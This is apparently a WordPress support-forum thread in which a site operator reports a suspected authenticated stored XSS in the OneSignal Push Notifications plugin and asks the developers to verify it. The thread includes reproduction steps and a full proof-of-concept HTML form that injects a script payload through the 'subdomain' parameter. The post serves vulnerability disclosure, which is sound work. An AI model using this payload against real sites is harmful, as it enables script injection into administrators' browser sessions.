check Post-based stored XSS vulnerability in OneSignal Push Notifications Plugin

  • Resolved Sakthivel

    (@saravanankanagaraj)


    1 year, 5 months ago

    We have been utilizing the OneSignal Push Notifications plugin (version 2.4, the latest release) to send blog notifications to our customers' browsers. However, we have recently received a report from one of our customers regarding a potential post-based stored XSS vulnerability within the plugin.

    As a precautionary measure, I have temporarily deactivated the plugin to mitigate any potential risks. We kindly request your assistance in verifying whether the current version of the OneSignal Push Notifications plugin is affected by this post-based stored XSS vulnerability.

    We greatly appreciate your prompt attention to this matter and look forward to receiving your guidance on the issue. If any further information is required, please do not hesitate to reach out to me.


    Description:

    The application suffers from an authenticated stored XSS via a POST request.

    The issue is triggered when input passed via the POST parameter 'subdomain' is not properly sanitized before being returned to the user. This can be exploited.

    to execute arbitrary HTML and script code in a user's browser session in the context of an affected site


    Steps to Reproduce:

    1. Navigate to?https://127.0.0.1/wp-admin/admin.php?page=onesignal-push

    2. Login with your credentials

    3. Parameter?subdomain= is vulnerable to authenticated post-based stored XSS
    <html>
    ? <body>
    ? <script>history.pushState('', 'SHPA', '/')</script>
    ? ? <form action="https://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
    ? ? ? <input type="hidden" name="onesignal_config_page_nonce" value="f70a4f" />
    ? ? ? <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
    ? ? ? <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc1" />
    ? ? ? <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItZl" />
    ? ? ??<input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
    ? ? ? <input type="hidden" name="safari_web_id" value="" />
    ? ? ? <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
    ? ? ? <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
    ? ? ? <input type="hidden" name="persist_notifications" value="platform-default" />
    ? ? ? <input type="hidden" name="notification_title" value="hACKME" />
    ? ? ? <input type="hidden" name="notifyButton_enable" value="true" />
    ? ? ? <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
    ? ? ? <input type="hidden" name="notifyButton_prenotify" value="true" />
    ? ? ? <input type="hidden" name="notifyButton_showcredit" value="true" />
    ? ? ? <input type="hidden" name="notifyButton_customize_enable" value="true" />
    ? ? ? <input type="hidden" name="notifyButton_size" value="medium" />
    ? ? ? <input type="hidden" name="notifyButton_position" value="bottom-right" />
    ? ? ? <input type="hidden" name="notifyButton_theme" value="default" />
    ? ? ? <input type="hidden" name="notifyButton_offset_bottom" value="" />
    ? ? ? <input type="hidden" name="notifyButton_offset_left" value="" />
    ? ? ? <input type="hidden" name="notifyButton_offset_right" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_background" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_foreground" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_badge_background" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_badge_foreground" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_badge_border" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_pulse" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_popup_button_background" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
    ? ? ? <input type="hidden" name="notifyButton_color_popup_button_color" value="" />
    ? ? ? <input type="hidden" name="notifyButton_message_prenotify" value="" />
    ? ? ? <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
    ? ? ? <input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
    ? ? ? <input type="hidden" name="notifyButton_tip_state_blocked" value="" />
    ? ? ? <input type="hidden" name="notifyButton_message_action_subscribed" value="" />
    ? ? ? <input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
    ? ? ? <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
    ? ? ? <input type="hidden" name="notifyButton_dialog_main_title" value="" />
    ? ? ? <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
    ? ? ? <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
    ? ? ? <input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
    ? ? ? <input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
    ? ? ? <input type="hidden" name="prompt_customize_enable" value="true" />
    ? ? ? <input type="hidden" name="prompt_action_message" value="" />
    ? ? ? <input type="hidden" name="prompt_auto_accept_title" value="" />
    ? ? ? <input type="hidden" name="prompt_site_name" value="" />
    ? ? ? <input type="hidden" name="prompt_example_notification_title_desktop" value="" />
    ? ? ? <input type="hidden" name="prompt_example_notification_message_desktop" value="" />
    ? ? ? <input type="hidden" name="prompt_example_notification_title_mobile" value="" />
    ? ? ? <input type="hidden" name="prompt_example_notification_message_mobile" value="" />
    ? ? ? <input type="hidden" name="prompt_example_notification_caption" value="" />
    ? ? ? <input type="hidden" name="prompt_accept_button_text" value="" />
    ? ? ? <input type="hidden" name="prompt_cancel_button_text" value="" />
    ? ? ? <input type="hidden" name="send_welcome_notification" value="true" />
    ? ? ? <input type="hidden" name="welcome_notification_title" value="" />
    ? ? ? <input type="hidden" name="welcome_notification_message" value="" />
    ? ? ? <input type="hidden" name="welcome_notification_url" value="" />
    ? ? ? <input type="hidden" name="notification_on_post" value="true" />
    ? ? ? <input type="hidden" name="utm_additional_url_params" value="" />
    ? ? ? <input type="hidden" name="allowed_custom_post_types" value="" />
    ? ? ? <input type="hidden" name="custom_manifest_url" value="" />
    ? ? ? <input type="hidden" name="show_notification_send_status_message" value="true" />
    ? ? ? <input type="submit" value="Send" />
    ? ? </form>
    ? </body>
    </html>

    Impact:

    post-based stored XSS vulnerability

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘check Post-based stored XSS vulnerability in OneSignal Push Notifications Plugin’ is closed to new replies.